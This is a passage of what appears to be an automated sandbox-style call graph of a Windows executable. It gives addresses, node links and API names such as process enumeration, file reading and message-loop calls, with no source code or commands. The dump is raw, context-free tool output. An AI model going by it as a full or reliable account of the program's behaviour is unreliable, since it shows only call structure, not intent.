140007af0 46 API calls 55331->55333 55334 140007a40 _RunAllParam 46 API calls 55332->55334 55335 1400394ad 55333->55335 55337 140039460 55334->55337 55358 140011370 57 API calls shared_ptr 55335->55358 55339 140010426 55336->55339 55340 140007a40 _RunAllParam 46 API calls 55337->55340 55341 140007a40 _RunAllParam 46 API calls 55339->55341 55340->55254 55342 140010430 55341->55342 55343 140007a40 _RunAllParam 46 API calls 55342->55343 55344 14001043d 55343->55344 55345 140007a40 _RunAllParam 46 API calls 55344->55345 55346 1400055c0 55345->55346 55347->55314 55348->55322 55349->55329 55350->55227 55352->55249 55353->55276 55354->55267 55355->55293 55356->55249 55357->55320 55358->55303 55359->55316 55360->55321 55361->55249 55362->55254 55364 140096800 55365 140062190 95 API calls 55364->55365 55366 14009683f 55365->55366 55367 1400038e0 105 API calls 55366->55367 55368 140096855 55367->55368 55369 14009687f 55368->55369 55370 140005700 107 API calls 55368->55370 55371 140012d80 57 API calls 55369->55371 55372 140096883 55369->55372 55370->55369 55371->55372 55373 140087a80 55374 140087a9e _flush 55373->55374 55375 14000fd50 shared_ptr 56 API calls 55374->55375 55376 140087abb shared_ptr 55375->55376 55377 140087ad8 CreateToolhelp32Snapshot Process32FirstW 55376->55377 55381 140087b04 55377->55381 55378 14001823c 45 API calls 55378->55381 55379 140062190 95 API calls 55379->55381 55380 1400107e0 shared_ptr 56 API calls 55380->55381 55381->55378 55381->55379 55381->55380 55382 140087b9c Process32NextW 55381->55382 55383 140016d8c 47 API calls 55381->55383 55382->55381 55384 140087bb1 FindCloseChangeNotification 55382->55384 55383->55381 55385 140012b40 57 API calls 55384->55385 55386 140087bd2 55385->55386 55387 140011400 57 API calls 55386->55387 55388 140087be8 55387->55388 55389 140007a40 _RunAllParam 46 API calls 55388->55389 55393 140087bf3 55389->55393 55390 140087c75 55391 1400024f0 std::exception_ptr::_Current_exception 45 API calls 55390->55391 55392 140087c94 std::exception_ptr::_Current_exception 55391->55392 55393->55390 55394 140012d80 57 API calls 55393->55394 55395 140011400 57 API calls 55393->55395 55396 140007a40 _RunAllParam 46 API calls 55393->55396 55394->55393 55395->55393 55396->55393 55397 14006a100 55398 1400402b0 5 API calls 55397->55398 55399 14006a10e 55398->55399 55400 14006a11a 55399->55400 55401 140007a40 _RunAllParam 46 API calls 55399->55401 55401->55400 55402 1400194c0 55403 1400194f2 55402->55403 55404 140019518 55402->55404 55462 14001eae4 45 API calls _getptd 55403->55462 55406 140019526 55404->55406 55407 14001954c 55404->55407 55464 14001eae4 45 API calls _getptd 55406->55464 55408 14001955b 55407->55408 55409 14001957e 55407->55409 55466 14001eae4 45 API calls _getptd 55408->55466 55430 1400245b4 55409->55430 55410 1400194f7 55463 14001ea14 7 API calls __wtomb_environ 55410->55463 55415 14001952b 55465 14001ea14 7 API calls __wtomb_environ 55415->55465 55416 140019560 55467 14001ea14 7 API calls __wtomb_environ 55416->55467 55427 140019511 55431 14001f1bc _lock 45 API calls 55430->55431 55432 1400245cd 55431->55432 55433 14002465c 55432->55433 55438 14001f0d4 _lock 45 API calls 55432->55438 55444 140024649 55432->55444 55472 14001c44c 46 API calls _lock 55432->55472 55473 14001c4d4 LeaveCriticalSection LeaveCriticalSection __tzset 55432->55473 55435 14001d910 _getbuf 45 API calls 55433->55435 55437 140024669 55435->55437 55437->55444 55474 14001f83c InitializeCriticalSectionAndSpinCount 55437->55474 55438->55432 55441 140024694 55442 140024698 55441->55442 55443 1400246b6 EnterCriticalSection 55441->55443 55445 140017ec8 free 45 API calls 55442->55445 55443->55444 55471 14001f0bc LeaveCriticalSection 55444->55471 55445->55444 55462->55410 55463->55427 55464->55415 55465->55427 55466->55416 55467->55427 55472->55432 55473->55432 55474->55441 55617 140005600 55620 140013770 55617->55620 55619 14000560b 55629 140011220 55620->55629 55622 14001379f 55623 1400137bb 55622->55623 55624 1400395a0 55622->55624 55627 1400137c9 55622->55627 55623->55627 55636 140010a00 55623->55636 55642 1400700a0 100 API calls 3 library calls 55624->55642 55627->55619 55628 1400137ea 55628->55619 55630 140005700 107 API calls 55629->55630 55633 140011250 55630->55633 55631 140011273 55631->55622 55632 140007a40 _RunAllParam 46 API calls 55631->55632 55634 140039005 55632->55634 55633->55631 55635 140007a40 _RunAllParam 46 API calls 55633->55635 55634->55622 55635->55631 55637 140010a17 55636->55637 55638 140010a45 std::exception_ptr::_Current_exception 55636->55638 55637->55638 55639 140007a40 _RunAllParam 46 API calls 55637->55639 55638->55628 55640 140010a3c 55639->55640 55641 140007a40 _RunAllParam 46 API calls 55640->55641 55641->55638 55642->55627 55643 140005e42 55644 1400047b0 57 API calls 55643->55644 55645 140005e4f 55644->55645 55648 140007d40 55645->55648 55665 140007bf0 55648->55665 55651 140036450 55686 1400024b0 46 API calls _RunAllParam 55651->55686 55653 14003645a 55687 1400700a0 100 API calls 3 library calls 55653->55687 55654 140007dae 55654->55653 55658 140007df3 55654->55658 55656 140036474 55688 1400024b0 46 API calls _RunAllParam 55656->55688 55681 14000fb80 55658->55681 55666 140007c1b 55665->55666 55667 140034c70 55665->55667 55689 14000ffc0 55666->55689 55695 1400700a0 100 API calls 3 library calls 55667->55695 55670 140034c87 55696 1400700a0 100 API calls 3 library calls 55670->55696 55671 140007d13 55671->55651 55671->55654 55674 140005700 107 API calls 55679 140007c41 55674->55679 55675 140034cb5 55676 140007a40 _RunAllParam 46 API calls 55675->55676 55676->55671 55677 140007d15 55677->55671 55678 140007a40 _RunAllParam 46 API calls 55677->55678 55678->55671 55679->55670 55679->55671 55679->55674 55679->55675 55679->55677 55680 140007a40 _RunAllParam 46 API calls 55679->55680 55694 1400049b0 56 API calls 2 library calls 55679->55694 55680->55679 55682 140007a40 _RunAllParam 46 API calls 55681->55682 55683 14000fba7 55682->55683 55698 14000fc40 55683->55698 55685 14000fbdc 55687->55656 55691 14000ffe0 55689->55691 55690 14001000c 55690->55679 55691->55690 55697 1400700a0 100 API calls 3 library calls 55691->55697 55693 140033abb 55694->55679 55695->55670 55696->55675 55697->55693 55699 14000fc66 55698->55699 55700 140007a40 _RunAllParam 46 API calls 55699->55700 55701 14000fc72 55700->55701 55701->55685 55702 140038148 55703 1400047b0 57 API calls 55702->55703 55704 140038155 55703->55704 55707 140006080 55704->55707 55706 14003817d 55708 1400060c2 shared_ptr 55707->55708 55709 140016ed8 shared_ptr 56 API calls 55708->55709 55765 140006174 shared_ptr __initmbctable _RunAllParam std::exception_ptr::_Current_exception 55708->55765 55710 140006105 __initmbctable 55709->55710 55712 140016ed8 shared_ptr 56 API calls 55710->55712 55711 1400118e0 shared_ptr 56 API calls 55711->55765 55713 140006127 55712->55713 55714 1400071e7 std::exception_ptr::_Current_exception 55713->55714 55715 140006159 CharUpperBuffW 55713->55715 55713->55765 55917 140092530 139 API calls 2 library calls 55714->55917 55715->55765 55717 140037deb 55719 1400700a0 100 API calls 55719->55765 55720 140010580 56 API calls 55720->55765 55721 140036810 VariantClear 55721->55765 55722 140006add 55724 1400372e0 std::exception_ptr::_Current_exception 55722->55724 55725 140006b6b 55722->55725 55723 140005240 47 API calls 55723->55765 55907 140086310 46 API calls 55724->55907 55727 140016ed8 shared_ptr 56 API calls 55725->55727 55733 140006b74 55727->55733 55728 140013280 _RunAllParam 46 API calls 55728->55765 55729 140012600 56 API calls 55729->55765 55730 140016ed8 56 API calls shared_ptr 55730->55765 55731 140007a40 46 API calls _RunAllParam 55731->55765 55732 140013190 _RunAllParam 46 API calls 55732->55765 55738 140006bd3 55733->55738 55825 1400072e0 55733->55825 55741 140010a00 46 API calls 55738->55741 55746 140006be0 std::exception_ptr::_Current_exception 55738->55746 55739 1400621c0 56 API calls 55739->55765 55740 14000f9e0 57 API calls 55740->55765 55741->55738 55743 1400040d0 56 API calls 55743->55765 55744 140007a40 _RunAllParam 46 API calls 55752 140006ca2 55744->55752 55745 140016bb4 55 API calls _cinit 55745->55765 55747 140006c58 55746->55747 55749 140037391 VariantClear 55746->55749 55746->55752 55756 140006c99 55746->55756 55750 1400373bf 55747->55750 55755 140006c7c std::exception_ptr::_Current_exception 55747->55755 55760 140006c6a 55747->55760 55748 140005700 107 API calls 55748->55765 55749->55755 55757 140013280 _RunAllParam 46 API calls 55750->55757 55751 140007af0 46 API calls 55751->55765 55759 140006d0a std::exception_ptr::_Current_exception 55752->55759 55761 140007af0 46 API calls 55752->55761 55753 140006746 55753->55706 55754 140082f90 57 API calls 55754->55765 55755->55756 55758 140016ed8 shared_ptr 56 API calls 55755->55758 55756->55744 55756->55752 55757->55755 55758->55756 55764 140006d54 55759->55764 55766 140037686 VariantClear 55759->55766 55793 140006de2 std::exception_ptr::_Current_exception 55759->55793 55760->55755 55908 140059370 45 API calls std::exception_ptr::_Current_exception 55760->55908 55761->55759 55763 1400584b0 56 API calls 55763->55765 55767 1400376b8 55764->55767 55771 140006d66 55764->55771 55776 140006d78 std::exception_ptr::_Current_exception 55764->55776 55765->55711 55765->55714 55765->55719 55765->55720 55765->55721 55765->55722 55765->55723 55765->55724 55765->55728 55765->55729 55765->55730 55765->55731 55765->55732 55765->55739 55765->55740 55765->55743 55765->55745 55765->55748 55765->55751 55765->55753 55765->55754 55765->55763 55902 1400024b0 46 API calls _RunAllParam 55765->55902 55903 140010660 107 API calls _RunAllParam 55765->55903 55904 1400049b0 56 API calls 2 library calls 55765->55904 55905 140059370 45 API calls std::exception_ptr::_Current_exception 55765->55905 55906 140070950 56 API calls 55765->55906 55766->55776 55768 140013280 _RunAllParam 46 API calls 55767->55768 55768->55776 55769 140006e82 55774 140037814 55769->55774 55779 140006ea6 std::exception_ptr::_Current_exception 55769->55779 55784 140006e94 55769->55784 55770 1400377e4 VariantClear 55770->55779 55771->55776 55909 140059370 45 API calls std::exception_ptr::_Current_exception 55771->55909 55772 14003772a VariantClear 55772->55793 55773 140006dbe 55782 14003775a 55773->55782 55789 140006dd0 55773->55789 55773->55793 55778 140013280 _RunAllParam 46 API calls 55774->55778 55776->55772 55776->55773 55777 140006f0d std::exception_ptr::_Current_exception 55781 140005240 47 API calls 55777->55781 55792 140006f1a 55777->55792 55778->55779 55779->55777 55809 140006f87 std::exception_ptr::_Current_exception 55779->55809 55889 140005240 55779->55889 55781->55792 55783 140013280 _RunAllParam 46 API calls 55782->55783 55783->55793 55784->55779 55911 140059370 45 API calls std::exception_ptr::_Current_exception 55784->55911 55785 140037b31 std::exception_ptr::_Current_exception 55788 140037b51 VariantClear 55785->55788 55795 140007035 std::exception_ptr::_Current_exception 55785->55795 55787 14000700d 55790 140037b84 55787->55790 55787->55795 55803 140007021 55787->55803 55788->55795 55789->55793 55910 140059370 45 API calls std::exception_ptr::_Current_exception 55789->55910 55797 140013280 _RunAllParam 46 API calls 55790->55797 55791 140037bd1 std::exception_ptr::_Current_exception 55798 140037bf9 VariantClear 55791->55798 55804 14000708a std::exception_ptr::_Current_exception 55791->55804 55799 140006f63 55792->55799 55800 140037abd VariantClear 55792->55800 55792->55809 55793->55769 55793->55770 55793->55779 55795->55791 55796 140007062 55795->55796 55801 140037c31 55796->55801 55796->55804 55813 140007076 55796->55813 55797->55795 55798->55804 55807 140037aed 55799->55807 55799->55809 55815 140006f75 55799->55815 55800->55809 55805 140013280 _RunAllParam 46 API calls 55801->55805 55802 140037c84 std::exception_ptr::_Current_exception 55810 140037ca6 VariantClear 55802->55810 55823 1400070c9 std::exception_ptr::_Current_exception 55802->55823 55803->55795 55913 140059370 45 API calls std::exception_ptr::_Current_exception 55803->55913 55804->55802 55806 1400070a5 55804->55806 55805->55804 55812 140037cda 55806->55812 55818 1400070b7 55806->55818 55806->55823 55811 140013280 _RunAllParam 46 API calls 55807->55811 55809->55785 55809->55787 55810->55823 55811->55809 55814 140013280 _RunAllParam 46 API calls 55812->55814 55813->55804 55914 140059370 45 API calls std::exception_ptr::_Current_exception 55813->55914 55814->55823 55815->55809 55912 140059370 45 API calls std::exception_ptr::_Current_exception 55815->55912 55818->55823 55915 140059370 45 API calls std::exception_ptr::_Current_exception 55818->55915 55819 1400071b3 55819->55706 55821 140037d49 VariantClear 55821->55823 55822 140013280 _RunAllParam 46 API calls 55822->55823 55823->55819 55823->55821 55823->55822 55916 140059370 45 API calls std::exception_ptr::_Current_exception 55823->55916 55826 14003a850 55825->55826 55827 140007300 55825->55827 56100 1400700a0 100 API calls 3 library calls 55826->56100 55884 140007311 std::exception_ptr::_Current_exception 55827->55884 56073 140014250 55827->56073 55830 1400074cb 55831 1400075ee 55830->55831 56078 1400141e0 55830->56078 55831->55738 55834 140007373 PeekMessageW 55834->55884 55835 140001eb0 46 API calls 55835->55884 55837 14003a9a1 Sleep 55837->55884 55839 14000758e 56099 140001eb0 46 API calls _RunAllParam 55839->56099 55841 14003a9bf timeGetTime 55841->55884 55842 1400077bf 55843 14003b3c1 TranslateMessage DispatchMessageW GetMessageW 55842->55843 55843->55831 55843->55843 55846 14000771a PeekMessageW 55846->55884 55847 140058df0 56 API calls 55888 14000769e std::exception_ptr::_Current_exception 55847->55888 55849 140012600 56 API calls 55849->55884 55850 1400076fe TranslateMessage DispatchMessageA 55850->55846 55851 14003ae8d WaitForSingleObject 55856 14003aeae GetExitCodeProcess CloseHandle 55851->55856 55851->55884 55853 140082090 106 API calls 55853->55888 55854 140007676 Sleep 55858 14000768a timeGetTime 55854->55858 55854->55888 55855 140091ee0 230 API calls 55855->55884 56103 140001eb0 46 API calls _RunAllParam 55856->56103 55858->55888 55859 14003b220 Sleep 55861 14003b238 timeGetTime 55859->55861 55859->55888 55861->55888 55864 140007a40 46 API calls _RunAllParam 55864->55888 55865 14003b273 CloseHandle 55865->55888 55866 140076ad0 57 API calls 55866->55884 55869 14003b32a GetExitCodeProcess CloseHandle 55869->55888 55870 140076ad0 57 API calls 55870->55888 55872 14000fc40 46 API calls 55874 14003b3a1 Sleep 55872->55874 55873 140001d30 56 API calls shared_ptr 55873->55888 55874->55884 55876 140082f90 57 API calls 55876->55888 55877 140006080 230 API calls 55877->55884 55878 140007d40 107 API calls 55878->55884 55880 1400700a0 100 API calls 55880->55884 55881 140007a40 46 API calls _RunAllParam 55881->55884 55882 14003b00b VariantClear 55882->55884 55884->55830 55884->55834 55884->55835 55884->55837 55884->55839 55884->55841 55884->55846 55884->55849 55884->55850 55884->55851 55884->55854 55884->55855 55884->55859 55884->55866 55884->55877 55884->55878 55884->55880 55884->55881 55884->55882 55885 140013280 _RunAllParam 46 API calls 55884->55885 55884->55888 55918 1400077d0 55884->55918 55984 140005380 55884->55984 56016 1400077f0 55884->56016 56062 140011790 55884->56062 56067 140011740 55884->56067 56104 140094ba0 154 API calls _RunAllParam 55884->56104 56105 140059370 45 API calls std::exception_ptr::_Current_exception 55884->56105 55885->55884 55887 140091ee0 230 API calls 55887->55888 55888->55847 55888->55853 55888->55864 55888->55865 55888->55869 55888->55870 55888->55872 55888->55873 55888->55874 55888->55876 55888->55884 55888->55887 56101 140060860 57 API calls std::exception_ptr::_Current_exception 55888->56101 56102 140062d20 57 API calls std::exception_ptr::_Current_exception 55888->56102 56106 140085700 46 API calls 55888->56106 56107 140040590 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 55888->56107 56108 140001eb0 46 API calls _RunAllParam 55888->56108 56109 140050890 50 API calls shared_ptr 55888->56109 56110 1400673a0 46 API calls _RunAllParam 55888->56110 55890 14000524d 55889->55890 55898 1400052d5 std::exception_ptr::_Current_exception 55889->55898 55891 14000526b 55890->55891 55892 140005240 46 API calls 55890->55892 55893 140005240 46 API calls 55891->55893 55899 140005278 55891->55899 55892->55891 55893->55899 55894 1400052b1 55896 140005370 55894->55896 55894->55898 55900 1400052c3 55894->55900 55895 1400344ac VariantClear 55895->55898 55897 140013280 _RunAllParam 46 API calls 55896->55897 55897->55898 55898->55777 55899->55894 55899->55895 55899->55898 55900->55898 56160 140059370 45 API calls std::exception_ptr::_Current_exception 55900->56160 55903->55765 55904->55765 55905->55765 55906->55765 55907->55738 55908->55755 55909->55776 55910->55793 55911->55779 55912->55809 55913->55795 55914->55804 55915->55823 55916->55823 55917->55717 55919 1400077e4 55918->55919 55920 140039a60 55918->55920 55919->55884 55920->55919 55921 14000fd50 shared_ptr 56 API calls 55920->55921 55922 140039ac5 55921->55922 55924 140039ae5 Sleep 55922->55924 55925 140039c9c 55922->55925 55927 140039b0d 55922->55927 55923 14003a0e2 std::exception_ptr::_Current_exception 55928 140007a40 _RunAllParam 46 API calls 55923->55928 55924->55922 55924->55927 55926 140039ca5 std::exception_ptr::_Current_exception 55925->55926 55925->55927 55932 140007a40 _RunAllParam 46 API calls 55926->55932 55927->55923 55930 140007af0 46 API calls 55927->55930 55929 14003a118 55928->55929 56126 1400024b0 46 API calls _RunAllParam 55929->56126 55933 140039b6a 55930->55933 55935 140039cc4 55932->55935 55936 140062190 95 API calls 55933->55936 56119 1400024b0 46 API calls _RunAllParam 55935->56119 55938 140039b77 55936->55938 55939 1400107e0 shared_ptr 56 API calls 55938->55939 55940 140039b87 55939->55940 55941 140062190 95 API calls 55940->55941 55942 140039b94 55941->55942 56111 1400117b0 56 API calls 2 library calls 55942->56111 55944 140039ba4 56112 140076ad0 55944->56112 55947 140039cd2 55949 140001d30 shared_ptr 56 API calls 55947->55949 55948 140062190 95 API calls 55950 140039bf2 55948->55950 55951 140039d08 55949->55951 55952 140076ad0 57 API calls 55950->55952 55955 140082f90 57 API calls 55951->55955 55953 140039c21 55952->55953 55953->55947 55954 140039c29 55953->55954 56117 140082110 46 API calls _RunAllParam 55954->56117 55965 140039d37 std::exception_ptr::_Current_exception 55955->55965 55957 140039c3e std::exception_ptr::_Current_exception 55958 140007a40 _RunAllParam 46 API calls 55957->55958 55959 140039c63 55958->55959 56118 1400024b0 46 API calls _RunAllParam 55959->56118 55961 140039de9 56121 140082110 46 API calls _RunAllParam 55961->56121 55963 140039e05 56122 140082240 56 API calls 55963->56122 55965->55961 55966 140039ec5 55965->55966 56120 1400049b0 56 API calls 2 library calls 55965->56120 56123 1400700a0 100 API calls 3 library calls 55966->56123 55969 14003a01f 56124 140091ee0 254 API calls _RunAllParam 55969->56124 55971 14003a037 55974 140001d30 shared_ptr 56 API calls 55971->55974 55972 140007a40 _RunAllParam 46 API calls 55980 140039e26 std::exception_ptr::_Current_exception 55972->55980 55973 140007a40 _RunAllParam 46 API calls 55975 14003a0d8 55973->55975 55976 14003a057 55974->55976 56125 1400024b0 46 API calls _RunAllParam 55975->56125 55979 140010580 56 API calls 55976->55979 55977 140082f90 57 API calls 55977->55980 55982 140039ed6 std::exception_ptr::_Current_exception 55979->55982 55980->55969 55980->55972 55980->55977 55981 1400040d0 56 API calls 55980->55981 55983 140005700 107 API calls 55980->55983 55981->55980 55982->55973 55983->55980 55985 140005565 55984->55985 55986 1400053ad 55984->55986 56127 1400700a0 100 API calls 3 library calls 55985->56127 55987 14003a31f 55986->55987 55988 1400053ba 55986->55988 56128 1400700a0 100 API calls 3 library calls 55987->56128 55992 140005700 107 API calls 55988->55992 56007 140005539 std::exception_ptr::_Current_exception 55988->56007 55991 140005553 55991->55884 55994 1400053f9 55992->55994 55993 14003a337 55998 140007a40 _RunAllParam 46 API calls 55993->55998 55994->55993 55996 140005401 std::exception_ptr::_Current_exception 55994->55996 55999 140005448 55996->55999 56000 14003a379 VariantClear 55996->56000 56011 140005492 55996->56011 55997 14003a682 55998->55991 56003 14003a3a9 55999->56003 56004 14000546c std::exception_ptr::_Current_exception 55999->56004 56012 14000545a 55999->56012 56000->56004 56001 140005515 56006 14003a624 56001->56006 56001->56007 56013 140005527 56001->56013 56002 14003a5f0 VariantClear 56002->56007 56005 140013280 _RunAllParam 46 API calls 56003->56005 56010 140016ed8 shared_ptr 56 API calls 56004->56010 56004->56011 56005->56004 56008 140013280 _RunAllParam 46 API calls 56006->56008 56007->55991 56131 1400700a0 100 API calls 3 library calls 56007->56131 56008->56007 56009 14003a3f8 56009->56002 56009->56007 56010->56011 56011->56001 56011->56009 56012->56004 56129 140059370 45 API calls std::exception_ptr::_Current_exception 56012->56129 56013->56007 56130 140059370 45 API calls std::exception_ptr::_Current_exception 56013->56130 56017 140007854 56016->56017 56018 1400397c0 56016->56018 56019 14000f740 56 API calls 56017->56019 56021 14000786c 56017->56021 56133 140011600 56 API calls 56018->56133 56019->56021 56022 140039801 56021->56022 56028 1400078a8 56021->56028 56039 1400078e8 56021->56039 56134 1400700a0 100 API calls 3 library calls 56022->56134 56023 140005700 107 API calls 56025 14000793b 56023->56025 56029 14003988b 56025->56029 56036 140007962 56025->56036 56037 1400079b9 56025->56037 56053 140039879 56025->56053 56026 1400398db 56137 1400700a0 100 API calls 3 library calls 56026->56137 56034 140039895 std::exception_ptr::_Current_exception 56028->56034 56035 1400078de 56028->56035 56138 14008cdc0 120 API calls 2 library calls 56028->56138 56032 140007a40 _RunAllParam 46 API calls 56029->56032 56031 140007982 std::exception_ptr::_Current_exception 56031->55884 56032->56034 56034->56026 56136 140010660 107 API calls _RunAllParam 56034->56136 56035->56034 56035->56039 56139 140094ba0 154 API calls _RunAllParam 56035->56139 56041 140007a19 56036->56041 56042 14000796b 56036->56042 56047 1400079dd 56037->56047 56037->56053 56039->56023 56039->56034 56039->56053 56044 140007a22 56041->56044 56045 1400399d0 56041->56045 56043 140007af0 46 API calls 56042->56043 56061 140007978 56043->56061 56132 140004f40 46 API calls 2 library calls 56044->56132 56051 140039a03 56045->56051 56055 1400399e7 56045->56055 56057 140039a23 56045->56057 56060 140039a10 56045->56060 56049 14000f9e0 57 API calls 56047->56049 56048 140007a40 _RunAllParam 46 API calls 56048->56031 56054 1400079f6 56049->56054 56141 140004850 47 API calls std::exception_ptr::_Current_exception 56051->56141 56135 1400700a0 100 API calls 3 library calls 56053->56135 56058 140007a40 _RunAllParam 46 API calls 56054->56058 56055->56061 56140 140004770 95 API calls 56055->56140 56143 140061db0 47 API calls 56057->56143 56058->56031 56142 1400048e0 46 API calls 2 library calls 56060->56142 56061->56048 56063 1400117a1 56062->56063 56064 140031320 56062->56064 56063->55884 56065 14003136f 56064->56065 56066 140031349 TranslateAcceleratorW 56064->56066 56066->56063 56068 140031880 56067->56068 56071 14001174e 56067->56071 56068->55884 56069 1400318e3 IsDialogMessageW 56070 140011774 56069->56070 56069->56071 56070->55884 56071->56069 56071->56070 56144 14003ddf0 GetClassLongPtrW 56071->56144 56076 140014265 56073->56076 56074 14001426e 56074->55884 56075 140076ad0 57 API calls 56075->56076 56076->56074 56076->56075 56145 140082290 56076->56145 56154 140014220 56078->56154 56080 140007777 56080->55831 56083 140001c40 56080->56083 56082 1400141ee 56082->56080 56158 140059810 5 API calls _RunAllParam 56082->56158 56084 140001d30 shared_ptr 56 API calls 56083->56084 56085 140001c78 56084->56085 56086 14000f9e0 57 API calls 56085->56086 56087 140001c92 std::exception_ptr::_Current_exception 56086->56087 56088 140007a40 _RunAllParam 46 API calls 56087->56088 56089 140001cac 56088->56089 56090 140001d30 shared_ptr 56 API calls 56089->56090 56091 140001cc9 56090->56091 56092 14000f9e0 57 API calls 56091->56092 56097 140001ce3 std::exception_ptr::_Current_exception 56092->56097 56093 140001d0f 56094 140007a40 _RunAllParam 46 API calls 56093->56094 56096 140001d23 LockWindowUpdate DestroyWindow GetMessageW 56094->56096 56095 140076ad0 57 API calls 56095->56097 56096->55831 56096->55842 56097->56093 56097->56095 56098 140082290 254 API calls 56097->56098 56098->56097 56099->55830 56100->55884 56101->55888 56102->55888 56103->55888 56104->55884 56105->55884 56106->55888 56107->55888 56108->55888 56109->55888 56110->55888 56111->55944 56113 140001d30 shared_ptr 56 API calls 56112->56113 56114 140076af2 56113->56114 56115 140015cd0 57 API calls 56114->56115 56116 140039bd8 56115->56116 56116->55947 56116->55948 56117->55957 56120->55965 56121->55963 56122->55980 56123->55982 56124->55971 56127->55987 56128->55993 56129->56004 56130->56007 56131->55997 56132->56061 56133->56017 56134->56031 56135->56029 56136->56034 56137->56031 56138->56035 56139->56039 56140->56061 56141->56060 56142->56057 56143->56031 56146 1400822cf 56145->56146 56147 1400822c3 56145->56147 56149 1400072e0 254 API calls 56146->56149 56153 140082240 56 API calls 56147->56153 56150 1400822da 56149->56150 56151 140082302 56150->56151 56152 140010a00 46 API calls 56150->56152 56151->56076 56152->56150 56153->56146 56157 14001422d 56154->56157 56155 140014236 56155->56082 56157->56155 56159 14004ede0 InternetCloseHandle InternetCloseHandle 56157->56159 56158->56082 56160->55898 56161 140081bd0 56162 140012d80 57 API calls 56161->56162 56163 140081c04 56162->56163 56164 140016ed8 shared_ptr 56 API calls 56163->56164 56166 140081c83 56163->56166 56165 140081c21 56164->56165 56167 140081c2e 56165->56167 56231 1400133b0 57 API calls 2 library calls 56165->56231 56172 140081c68 56166->56172 56174 140081cb8 56166->56174 56214 14005a320 56166->56214 56198 140011960 56167->56198 56176 140081cdc 56174->56176 56177 140081d4d 56174->56177 56179 140016ed8 shared_ptr 56 API calls 56176->56179 56180 14000fd50 shared_ptr 56 API calls 56177->56180 56178 140081c56 56178->56172 56232 140058c80 FindCloseChangeNotification std::exception_ptr::_Current_exception 56178->56232 56181 140081ce4 56179->56181 56182 140081d57 56180->56182 56233 140050ab0 ReadFile SetFilePointerEx 56181->56233 56217 140080c50 56182->56217 56186 140081cf7 56194 140081cfb std::exception_ptr::_Current_exception 56186->56194 56234 140061f10 57 API calls 3 library calls 56186->56234 56189 140013120 57 API calls 56191 140081d91 56189->56191 56190 140081d21 __initmbctable 56193 14000fc40 46 API calls 56190->56193 56192 14000fc40 46 API calls 56191->56192 56192->56194 56193->56194 56194->56172 56227 1400133f0 56194->56227 56199 140011973 56198->56199 56200 140032ab0 56198->56200 56202 1400134a0 56199->56202 56200->56199 56236 140061f90 95 API calls 3 library calls 56200->56236 56203 1400133f0 std::exception_ptr::_Current_exception FindCloseChangeNotification 56202->56203 56204 1400134bd 56203->56204 56237 140015ff0 56204->56237 56207 140031f00 56210 14001350d 56268 140015fc0 SetFilePointerEx SetFilePointerEx WriteFile 56210->56268 56213 140013515 56213->56166 56213->56178 56215 140050900 2 API calls 56214->56215 56216 14005a32e 56215->56216 56216->56174 56218 140080c5a 56217->56218 56219 140080c74 56217->56219 56218->56219 56220 140080c60 56218->56220 56293 140070b90 58 API calls 56219->56293 56222 140080c6d 56220->56222 56223 140080c66 56220->56223 56288 140080be0 56222->56288 56283 14007a9e0 56223->56283 56224 140080c6b 56224->56189 56224->56194 56228 140013407 56227->56228 56229 14001341c 56227->56229 56235 140058c80 FindCloseChangeNotification std::exception_ptr::_Current_exception 56228->56235 56229->56228 56230 140013422 FindCloseChangeNotification 56229->56230 56230->56228 56231->56167 56232->56172 56233->56186 56234->56190 56235->56172 56236->56199 56238 140031c80 56237->56238 56239 14001600e CreateFileW 56237->56239 56240 1400134e7 56238->56240 56241 140031c86 CreateFileW 56238->56241 56239->56240 56240->56207 56245 140013530 56240->56245 56241->56240 56242 140031cbd 56241->56242 56243 140013630 2 API calls 56242->56243 56244 140031ccb 56243->56244 56244->56240 56247 140013541 _flush 56245->56247 56246 1400134f7 56246->56210 56261 140013630 56246->56261 56247->56246 56248 140013630 2 API calls 56247->56248 56252 1400135ab 56247->56252 56249 140013598 56248->56249 56269 140002670 56249->56269 56251 140013630 2 API calls 56251->56246 56252->56246 56253 140013630 2 API calls 56252->56253 56260 1400135e8 56252->56260 56254 140031e88 56253->56254 56275 140050900 56254->56275 56257 140016ed8 shared_ptr 56 API calls 56258 140031e9b 56257->56258 56259 140002670 2 API calls 56258->56259 56259->56260 56260->56251 56266 140013650 56261->56266 56262 140031550 56282 1400136e0 SetFilePointerEx 56262->56282 56263 1400136af SetFilePointerEx 56281 1400136e0 SetFilePointerEx 56263->56281 56266->56262 56266->56263 56267 140013680 56266->56267 56267->56210 56268->56213 56270 140002717 56269->56270 56274 140002697 56269->56274 56280 1400136e0 SetFilePointerEx 56270->56280 56271 1400026c3 56271->56252 56273 1400026df ReadFile 56273->56271 56273->56274 56274->56271 56274->56273 56276 140013630 2 API calls 56275->56276 56277 140050921 56276->56277 56278 140013630 2 API calls 56277->56278 56279 140031e90 56278->56279 56279->56257 56280->56274 56281->56267 56282->56267 56294 140011a60 56283->56294 56287 14007aa12 std::exception_ptr::_Current_exception 56287->56224 56289 140011a60 56 API calls 56288->56289 56290 140080c02 56289->56290 56291 14005a2a0 58 API calls 56290->56291 56292 140080c12 std::exception_ptr::_Current_exception 56291->56292 56292->56224 56293->56224 56295 140016ed8 shared_ptr 56 API calls 56294->56295 56296 140011a83 56295->56296 56297 1400118e0 shared_ptr 56 API calls 56296->56297 56298 140011a91 56297->56298 56299 14005a2a0 56298->56299 56305 140051d30 56299->56305 56301 14005a2c3 56303 14005a2f5 56301->56303 56311 140050a90 56301->56311 56314 14005a200 56 API calls 2 library calls 56301->56314 56303->56287 56306 140051d3e 56305->56306 56307 140051d5e 56306->56307 56308 1400118e0 shared_ptr 56 API calls 56306->56308 56307->56301 56309 140051d50 56308->56309 56310 140016ed8 shared_ptr 56 API calls 56309->56310 56310->56307 56312 140002670 2 API calls 56311->56312 56313 140050a9f 56312->56313 56313->56301 56314->56301 56315 14006dc90 56316 140062190 95 API calls 56315->56316 56317 14006dca5 56316->56317 56322 140040f30 56317->56322 56320 14006dcb9 56321 140007a40 _RunAllParam 46 API calls 56321->56320 56325 140040ee0 GetFileAttributesW 56322->56325 56326 140040ef7 FindFirstFileW 56325->56326 56327 140040f0b 56325->56327 56326->56327 56328 140040f10 FindClose 56326->56328 56327->56320 56327->56321 56328->56327 56329 14006ab90 56330 140062190 95 API calls 56329->56330 56331 14006aba0 SetWindowTextW 56330->56331 56332 14003a250 56333 140095d90 108 API calls 56332->56333 56334 14003a269 56333->56334 56335 14003498f 56336 140016ed8 